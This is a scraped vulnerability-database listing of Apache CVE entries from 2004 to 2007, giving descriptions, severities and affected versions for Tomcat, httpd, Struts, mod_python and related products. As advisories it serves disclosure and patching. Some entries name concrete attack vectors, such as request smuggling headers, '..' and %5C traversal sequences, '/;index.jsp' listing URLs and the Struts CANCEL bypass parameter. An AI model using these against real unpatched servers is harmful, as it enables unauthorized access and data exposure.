Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
CVE-2004-2650 MEDIUM

Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache james 2.2.0
CVE-2004-2680 MEDIUM

mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache mod_python *
CVE-2005-0088 HIGH

The publisher handler for mod_python 2.7.8 and earlier allows remote attackers to obtain access to restricted objects via a crafted URL.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache mod_python 1.9a
apache mod_python 2.7
apache mod_python 2.7.7
apache mod_python 2.7.5
apache mod_python 2.3
apache mod_python 2.6
apache mod_python 2.7.3
apache mod_python 2.4.1
apache mod_python 2.2
apache mod_python 2.6.2
apache mod_python 2.6.1
apache mod_python *
apache mod_python 2.7.6
apache mod_python 2.0
apache mod_python 2.1
apache mod_python 2.4
apache mod_python 2.5
apache mod_python 2.7.2
apache mod_python 2.6.3
apache mod_python 2.6.4
apache mod_python 2.7.1
apache mod_python 2.7.4
CVE-2005-0108 MEDIUM

Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache mod_auth_radius 1.5.4
CVE-2005-0808 MEDIUM

Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 3.1
apache tomcat 3.3
apache tomcat 3.1.1
apache tomcat 3.2.4
apache tomcat 3.2.1
apache tomcat 3.3.1a
apache tomcat 3.0
apache tomcat 3.2
apache tomcat 3.2.2
apache tomcat 3.2.3
CVE-2005-1266 MEDIUM

Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache spamassassin 3.0.3
apache spamassassin 3.0.1
apache spamassassin 3.0.2
CVE-2005-1268 MEDIUM

Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-193,

Products Affected

Vendor Product Version
apache http_server *
redhat enterprise_linux_desktop 4.0
debian debian_linux 3.1
redhat enterprise_linux_server 3.0
redhat enterprise_linux_server 4.0
redhat enterprise_linux_workstation 3.0
redhat enterprise_linux_desktop 3.0
redhat enterprise_linux_workstation 4.0
CVE-2005-1344 HIGH

Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.52
CVE-2005-2088 MEDIUM

The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 3.0
debian debian_linux 3.1
CVE-2005-2090 MEDIUM

Jakarta Tomcat 5.0.19 (Coyote/1.1) and Tomcat 4.1.24 (Coyote/1.0) allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Tomcat to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 5.0.19
apache tomcat 4.1.24
CVE-2005-2700 HIGH

ssl_engine_kernel.c in mod_ssl before 2.8.24, when using "SSLVerifyClient optional" in the global virtual host configuration, does not properly enforce "SSLVerifyClient require" in a per-location context, which allows remote attackers to bypass intended access restrictions.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 3.0
debian debian_linux 3.1
canonical ubuntu_linux 4.10
canonical ubuntu_linux 5.04
CVE-2005-2728 MEDIUM

The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.50
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.51
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 2.0.53
apache http_server 2.0.47
CVE-2005-2970 MEDIUM

Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
fedoraproject fedora_core 4
apache http_server *
redhat enterprise_linux_desktop 4.0
canonical ubuntu_linux 4.10
redhat enterprise_linux_server 3.0
canonical ubuntu_linux 5.04
redhat enterprise_linux_server 4.0
redhat enterprise_linux_workstation 3.0
redhat enterprise_linux_desktop 3.0
redhat enterprise_linux_workstation 4.0
canonical ubuntu_linux 5.10
CVE-2005-3164 LOW

The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat *
hitachi cosminexus_application_server 05_00_05_05_k
hitachi cosminexus_application_server 05_00_05_05_e
hitachi cosminexus_application_server 05_00_05_05_h
hitachi cosminexus_application_server 05_00_05_05_f
CVE-2005-3351 MEDIUM

SpamAssassin 3.0.4 allows attackers to bypass spam detection via an e-mail with a large number of recipients ("To" addresses), which triggers a bus error in Perl.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache spamassassin 3.0.4
CVE-2005-3352 MEDIUM

Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server *
apache http_server 2.2
CVE-2005-3357 MEDIUM

mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.0.36
apache http_server 2.0
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.53
apache http_server 2.0.47
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.55
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.0.35
apache http_server 2.0.46
apache http_server 2.0.54
apache http_server 2.0.50
apache http_server 2.0.45
apache http_server 2.0.51
apache http_server 2.0.28
apache http_server 2.0.37
CVE-2005-3510 MEDIUM

Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 5.5.10
apache tomcat 5.5.4
apache tomcat 5.5.9
apache tomcat 5.5.11
apache tomcat 5.5.2
apache tomcat 5.5.1
apache tomcat 5.5.6
apache tomcat 5.5.8
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.3
apache tomcat 5.5.0
CVE-2005-3745 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache struts 1.2.7
CVE-2005-4703 MEDIUM

Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.0.3
CVE-2005-4836 HIGH

The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 4.1.16
apache tomcat 4.1.33
apache tomcat 4.1.18
apache tomcat 4.1.28
apache tomcat 4.1.29
apache tomcat 4.1.34
apache tomcat 4.1.31
apache tomcat 4.1.15
apache tomcat 4.1.21
apache tomcat 4.1.40
apache tomcat 4.1.17
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 4.1.22
apache tomcat 4.1.24
apache tomcat 4.1.19
apache tomcat 4.1.37
apache tomcat 4.1.27
apache tomcat 4.1.39
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 4.1.23
apache tomcat 4.1.36
CVE-2005-4838 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the example web applications for Jakarta Tomcat 5.5.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) el/functions.jsp, (2) el/implicit-objects.jsp, and (3) jspx/textRotate.jspx in examples/jsp2/, as demonstrated via script in a request to snp/snoop.jsp. NOTE: other XSS issues in the manager were simultaneously reported, but these require admin access and do not cross privilege boundaries.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2005-4849 MEDIUM

Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache derby *
CVE-2006-0042 MEDIUM

Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers to cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
debian debian_linux 3.0
debian debian_linux 3.1
apache libapreq2 *
CVE-2006-0254 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache geronimo 1.0
CVE-2006-0743 MEDIUM

Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-134,

Products Affected

Vendor Product Version
apache log4net 1.2.9_beta
CVE-2006-1095 HIGH

Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache mod_python 3.2.7
CVE-2006-1546 HIGH

Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache struts *
CVE-2006-1547 HIGH

ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,CWE-749,

Products Affected

Vendor Product Version
apache struts *
apache commons_beanutils 1.7.0
CVE-2006-1548 MEDIUM

Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache struts *
CVE-2006-20001

A carefully crafted If: request header can cause a memory read, or write of a single zero byte, in a pool (heap) memory location beyond the header value sent. This could cause the process to crash. This issue affects Apache HTTP Server 2.4.54 and earlier.

Products Affected

Vendor Product Version
apache http_server *
CVE-2006-2447 MEDIUM

SpamAssassin before 3.1.3, when running with vpopmail and the paranoid (-P) switch, allows remote attackers to execute arbitrary commands via a crafted message that is not properly handled when invoking spamd with the virtual pop username.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache spamassassin 3.1.2
apache spamassassin 3.1.0
apache spamassassin 3.1.1
CVE-2006-2806 HIGH

The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache james 2.2.0
CVE-2006-3747 HIGH

Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 3.1
canonical ubuntu_linux 6.06
canonical ubuntu_linux 5.04
canonical ubuntu_linux 5.10
CVE-2006-3835 MEDIUM

Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (;) preceding a filename with a mapped extension, as demonstrated by URLs ending with /;index.jsp and /;help.do.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 5.0.28
apache tomcat 5.5.16
apache tomcat 5.5.12
apache tomcat 5.5.7
apache tomcat 5.5.9
CVE-2006-3918 MEDIUM

http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
canonical ubuntu_linux 7.10
redhat enterprise_linux_server 2.0
apache http_server *
debian debian_linux 3.1
canonical ubuntu_linux 6.06
redhat enterprise_linux_workstation 2.0
canonical ubuntu_linux 6.10
canonical ubuntu_linux 7.04
CVE-2006-5752 MEDIUM

Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
redhat enterprise_linux_desktop 4.0
redhat enterprise_linux_desktop 5.0
redhat enterprise_linux_server 3.0
redhat enterprise_linux_server 4.0
fedoraproject fedora 7
redhat enterprise_linux_desktop 3.0
canonical ubuntu_linux 6.10
canonical ubuntu_linux 6.06
redhat enterprise_linux_workstation 5.0
redhat enterprise_linux_workstation 3.0
redhat enterprise_linux_workstation 4.0
redhat enterprise_linux_server 5.0
canonical ubuntu_linux 7.04
redhat enterprise_linux_eus 4.5
CVE-2006-7195 MEDIUM

Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 5.0.17
apache tomcat 5.0.2
apache tomcat 5.0.26
apache tomcat 5.5.12
apache tomcat 5.5.14
apache tomcat 5.0.12
apache tomcat 5.5.15
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 5.0.22
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 5.0.14
apache tomcat 5.0.24
apache tomcat 5.0.16
apache tomcat 5.0.29
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.0.25
apache tomcat 5.5.0
apache tomcat 5.0.10
apache tomcat 5.0.13
apache tomcat 5.0.15
apache tomcat 5.0.28
apache tomcat 5.5.10
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 5.5.9
apache tomcat 5.0.23
apache tomcat 5.0.11
apache tomcat 5.0.19
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.0.18
apache tomcat 5.0.0
apache tomcat 5.0.1
CVE-2006-7196 MEDIUM

Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 5.0.5
apache tomcat 5.0.14
apache tomcat 5.0.24
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 4.0.3
apache tomcat 5.0.13
apache tomcat 5.0.28
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 5.5.9
apache tomcat 5.0.23
apache tomcat 4.0.1
apache tomcat 5.5.1
apache tomcat 5.0.19
apache tomcat 5.5.13
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 5.0.0
apache tomcat 5.0.7
apache tomcat 5.0.26
apache tomcat 5.5.12
apache tomcat 5.0.12
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat *
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 5.0.25
apache tomcat 5.0.10
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 4.0.6
apache tomcat 5.5.10
apache tomcat 5.0.6
apache tomcat 5.5.4
apache tomcat 5.5.2
apache tomcat 5.0.11
apache tomcat 5.0.18
apache tomcat 5.0.4
apache tomcat 5.0.1
CVE-2006-7197 HIGH

The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 5.5.15
CVE-2007-0086 HIGH

The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache http_server -
CVE-2007-0450 MEDIUM

Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat *
apache http_server -
CVE-2007-0774 HIGH

Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat_jk_web_server_connector 1.2.19
apache tomcat_jk_web_server_connector 1.2.20
CVE-2007-1355 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the appdev/sample/web/hello.jsp example application in Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.23, and 6.0.0 through 6.0.10 allow remote attackers to inject arbitrary web script or HTML via the test parameter and unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 5.0.2
apache tomcat 4.1.15
apache tomcat 5.0.22
apache tomcat 4.0.4
apache tomcat 5.0.5
apache tomcat 6.0.7
apache tomcat 5.0.14
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 5.0.16
apache tomcat 6.0.8
apache tomcat 4.0.3
apache tomcat 5.0.13
apache tomcat 4.1.24
apache tomcat 5.0.28
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 5.0.23
apache tomcat 4.0.1
apache tomcat 6.0.4
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 6.0.5
apache tomcat 5.0.7
apache tomcat 5.0.26
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 5.0.12
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 5.0.25
apache tomcat 6.0.6
apache tomcat 5.0.10
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 4.0.6
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 6.0.0
apache tomcat 5.0.11
apache tomcat 5.0.18
apache tomcat 6.0.9
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 5.0.1
CVE-2007-1358 LOW

Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 4.1.0
apache tomcat 4.0.0
apache tomcat 4.0.5
apache tomcat 4.0.1
apache tomcat 4.0.3
apache tomcat 4.0.2
apache tomcat 4.0.4
apache tomcat 4.0.6
CVE-2007-1742 LOW

suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.2.3
CVE-2007-1743 MEDIUM

suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.2.3
CVE-2007-1858 LOW

The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 5.0.17
apache tomcat 5.0.2
apache tomcat 5.0.26
apache tomcat 5.5.12
apache tomcat 5.5.14
apache tomcat 4.1.28
apache tomcat 5.0.12
apache tomcat 4.1.31
apache tomcat 5.5.15
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 5.0.22
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 5.0.14
apache tomcat 5.0.24
apache tomcat 5.0.16
apache tomcat 5.0.29
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.0.25
apache tomcat 5.5.0
apache tomcat 5.0.10
apache tomcat 5.0.13
apache tomcat 5.0.15
apache tomcat 5.0.28
apache tomcat 5.5.10
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 5.5.4
apache tomcat 5.5.9
apache tomcat 5.0.23
apache tomcat 5.5.2
apache tomcat 5.5.1
apache tomcat 5.0.11
apache tomcat 5.0.19
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 5.0.18
apache tomcat 5.0.0
apache tomcat 5.0.1
CVE-2007-1860 MEDIUM

mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat_jk_web_server_connector *
CVE-2007-1862 MEDIUM

The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.2.4
CVE-2007-2449 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the ';' character, as demonstrated by a URI containing a "snp/snoop.jsp;" sequence.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 5.5.15
